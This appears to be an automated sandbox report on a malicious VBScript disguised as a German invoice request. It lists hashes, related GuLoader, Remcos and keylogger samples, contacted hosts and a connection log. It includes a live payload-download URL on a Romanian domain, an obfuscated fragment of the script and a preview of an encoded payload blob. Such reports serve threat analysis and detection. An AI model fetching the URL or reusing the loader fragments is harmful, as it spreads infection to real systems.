                            https://contoso.com/powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://orthoimplantcenter.ropowershell.exe, 00000004.00000002.1684347363.000001DE8B6D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://aka.ms/pscore68powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://wicroft.compowershell.exe, 00000004.00000002.1710822472.000001DEA2092000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://orthoimplantcenter.ro/Bestyret.ocxXR1lXpowershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    188.241.183.45
                                    orthoimplantcenter.roRomania
                                    5588GTSCEGTSCentralEuropeAntelGermanyCZfalse
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1538491
                                    Start date and time:2024-10-21 13:08:39 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 49s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winVBS@9/9@2/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 81%
                                    • Number of executed functions: 54
                                    • Number of non-executed functions: 28
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 199.232.214.172
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 8028 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs
                                    TimeTypeDescription
                                    07:10:16API Interceptor1x Sleep call for process: wscript.exe modified
                                    07:10:19API Interceptor89x Sleep call for process: powershell.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    188.241.183.45Wniosek o numer faktury.wsfGet hashmaliciousUnknownBrowse
                                    • silinast.ro/Juglandin.xtp
                                    Prosba o oferte.wsfGet hashmaliciousGuLoaderBrowse
                                    • silinast.ro/Kommunikuternes.inf
                                    g 288322.vbsGet hashmaliciousGuLoaderBrowse
                                    • silinast.ro/Loveman232.msi
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    bg.microsoft.map.fastly.netMessage_2530136.emlGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    ekte.exeGet hashmaliciousFormBookBrowse
                                    • 199.232.210.172
                                    https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9Get hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    http://evriservicescompany.com/Get hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    d600758023374f78d58acafbcaf94af66ad203b28e22a.exeGet hashmaliciousQuasarBrowse
                                    • 199.232.214.172
                                    lvXRlexBnb.exeGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    flX5YA1C09.exeGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    SecuriteInfo.com.PUA.Tool.RemoteControl.20.28594.18180.exeGet hashmaliciousRMSRemoteAdminBrowse
                                    • 199.232.210.172
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    GTSCEGTSCentralEuropeAntelGermanyCZx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 157.25.111.135
                                    SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 89.44.138.129
                                    arm7.elfGet hashmaliciousUnknownBrowse
                                    • 94.42.225.19
                                    spc.elfGet hashmaliciousMiraiBrowse
                                    • 212.38.198.226
                                    arm6.elfGet hashmaliciousUnknownBrowse
                                    • 91.120.127.45
                                    SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 89.44.138.129
                                    spc.elfGet hashmaliciousMiraiBrowse
                                    • 94.42.225.51
                                    powerpc.elfGet hashmaliciousMiraiBrowse
                                    • 178.183.111.126
                                    db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                    • 91.139.6.161
                                    na.elfGet hashmaliciousMiraiBrowse
                                    • 89.40.18.190
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0eFACTURA RAGOZA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 188.241.183.45
                                    Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 188.241.183.45
                                    Spedizione.vbsGet hashmaliciousUnknownBrowse
                                    • 188.241.183.45
                                    FACTURA DE PAGO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 188.241.183.45
                                    PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 188.241.183.45
                                    https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9Get hashmaliciousUnknownBrowse
                                    • 188.241.183.45
                                    rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 188.241.183.45
                                    Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 188.241.183.45
                                    RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 188.241.183.45
                                    rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 188.241.183.45
                                    No context
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                    Category:dropped
                                    Size (bytes):71954
                                    Entropy (8bit):7.996617769952133
                                    Encrypted:true
                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):328
                                    Entropy (8bit):3.2478978672539016
                                    Encrypted:false
                                    SSDEEP:6:kKo9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:rDImsLNkPlE99SNxAhUe/3
                                    MD5:3DF415CD8E6C7ECDF7EEF0DC5EBE89E4
                                    SHA1:69F96340399974E7E47A8ED8855CCED237025F03
                                    SHA-256:CD5B06D3A93BD7C1349CB4F7E7620C0EB9748588BB93B2F69CC66011E3C02040
                                    SHA-512:8C7683792C421187B47D2BBA58CBD304B5C54B9D70B0AFEA9CCB93CF7DBC29D0353F47C70FA32D95920A033E26EA8CC1EC886A7EA1CA506B77B8D7A1EB61A1F1
                                    Malicious:false
                                    Reputation:low
                                    Preview:p...... ...........#..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1628158735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllul5mxllp:NllU4x/
                                    MD5:3A925CB766CE4286E251C26E90B55CE8
                                    SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                    SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                    SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                    Malicious:false
                                    Preview:@...e................................................@..........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):487916
                                    Entropy (8bit):5.8746795421987645
                                    Encrypted:false
                                    SSDEEP:12288:zw60IEKztCkdDmbaUuBvz+/zDJBa6Nmpar20lbGZt:EjIzfmbatN0862yot
                                    MD5:E6A89DB6F68E95849840380F6B94B795
                                    SHA1:85CA246A7EBCD215510A1FD2EE90CCB3B3F0F9CF
                                    SHA-256:7D5E33F6279338D1377C18681827444CCF5CF983B0C812165807B414F2BFCCD4
                                    SHA-512:A12DB4243B28747EE8A3259A7AC87D1E3C9CACBB610684E314033DB0F06EE6F2A4010342A23FE32FA43CA0CDE8A7D534B98060221C2D60D5047AF2D3F1578C3E
                                    Malicious:false
                                    Preview:cQGbcQGbu120HQDrAq7s6wL0XgNcJARxAZvrAs0Xuax0mMnrAvMV6wLboIHxmDoEQ3EBm+sC7ZWB8TROnIrrAq1/cQGb6wK3O+sCEau6Lu42z3EBm3EBm3EBm3EBmzHK6wKUL3EBm4kUC+sCjQ9xAZvR4usCXTXrAua7g8EE6wLIA3EBm4H5Y+71AHzL6wLcJXEBm4tEJATrAuPIcQGbicNxAZtxAZuBw0XZaADrApYVcQGbumsAHntxAZvrApiMgerNQgRt6wLd8OsCFjOBwmJC5vHrAgmVcQGbcQGb6wK5aXEBm3EBm4sMEHEBm3EBm4kME+sCgabrAgOIQnEBm3EBm4H6YCEFAHXXcQGbcQGbiVwkDHEBm3EBm4HtAAMAAOsCS1ZxAZuLVCQI6wKwtHEBm4t8JARxAZtxAZuJ63EBm3EBm4HDnAAAAHEBm+sCm2tTcQGb6wKzx2pAcQGb6wK3qInrcQGbcQGbx4MAAQAAALAWAesCgV7rAmeJgcMAAQAAcQGb6wJM/FPrAnLZcQGbievrAvNY6wKpzYm7BAEAAOsCvS5xAZuBwwQBAABxAZvrAsStU+sC6A7rAidEav9xAZvrAnzYg8IFcQGb6wIJyjH26wKAlesCss8xyXEBm3EBm4sacQGb6wIisEFxAZtxAZs5HAp19HEBm+sCiM5G6wKcznEBm4B8Cvu4dd7rAieS6wIt1YtECvxxAZtxAZsp8HEBm3EBm//S6wKbYHEBm7pgIQUAcQGb6wIA+THAcQGb6wJbt4t8JAxxAZvrAq2JgTQH7E+q0usCYq/rAgzwg8AE6wJ6gXEBmznQdeNxAZvrAhnhifvrAiXr6wJzIv/X6wKlIesCY0METarS7HdUidWVIzdlEnVpPFuFz22MpnqjjCsRtdCdw228n41avoMOZxJ1VywakxllqhM9Fk1JUxa1hFLRzmuBlcVbUy1Ga5YezluB2Z1sVhOI7t/sdct9gHZgU6hCqqQwcyY5
                                    File type:ASCII text, with CRLF line terminators
                                    Entropy (8bit):5.293746378989499
                                    TrID:
                                    • Visual Basic Script (13500/0) 100.00%
                                    File name:Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs
                                    File size:28'924 bytes
                                    MD5:74bea39444aaab616939adfb22141173
                                    SHA1:68146894fedfe6a2c68fdbecfc6b26ce98c164e8
                                    SHA256:116129cfa708ab230b404febfa3a41c86c226849d41dde4120372d38c527be2d
                                    SHA512:20d12f32ce71cc58489917d413da96a0e4ba316d630160772611389876e441bb9ead06caff63d9efacb6dd38fd9e4d78fdedd82583b0b06798d7719c54ecb633
                                    SSDEEP:384:XrCibQg08pySoh9+OWF9W/JA1VCIDeD7vzzbfWzld9KJvi9:XeUQzb2GebDeXvzzbfWz39669
                                    TLSH:AFD23B3C48020FE81B4737B1064F2C20967966B3433D486C64D9A9E978ADB4A7D676FE
                                    File Content Preview:Sub Evulge(Konvojtronbestigelser,Transiteranatoleallo,Filstrenggenman,Shelteunderskabe,Polleesammentrykni)..If Konvojtronbestigelser = cstr(2614147) Then ....Cirkusforestillinge41 = Space(69)....End If....while (Alkydmalingernesb<31)..Alkydmalingernesb =
                                    Icon Hash:68d69b8f86ab9a86
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 21, 2024 13:10:20.947190046 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:20.947217941 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:20.947295904 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:20.954725981 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:20.954749107 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:21.849962950 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:21.850178957 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:21.853933096 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:21.853943110 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:21.854296923 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:21.865098953 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:21.907325029 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.141330004 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.141360044 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.141587019 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.141602993 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.190069914 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.260809898 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.260826111 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.260888100 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.260956049 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.290323019 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.290330887 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.290388107 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.290474892 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.291181087 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.291249990 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.409223080 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.409318924 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.409501076 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.409703016 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.437536001 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.437638998 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.438942909 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.439029932 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.439867020 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.439963102 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.440890074 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.440977097 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.524200916 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.524378061 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.524569035 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.524728060 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.557631016 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.557773113 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.558592081 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.558657885 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.586070061 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.586169958 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.586179972 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.586195946 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.586241007 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.586241007 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.595506907 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.595823050 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.639700890 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.639784098 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.672722101 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.672796965 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.673136950 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.673227072 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.674233913 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.674400091 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.701117992 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.701205969 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.701879025 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.702024937 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.754679918 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.754908085 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.755165100 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.755249977 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.788073063 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.788855076 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.788862944 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.788872004 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.788902044 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.788922071 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.816082001 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.816580057 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.816601038 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.817056894 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.817235947 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.817507029 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.870013952 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.870095015 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.903069973 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.903166056 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.903698921 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.903794050 CEST49706443192.168.2.11188.241.183.45
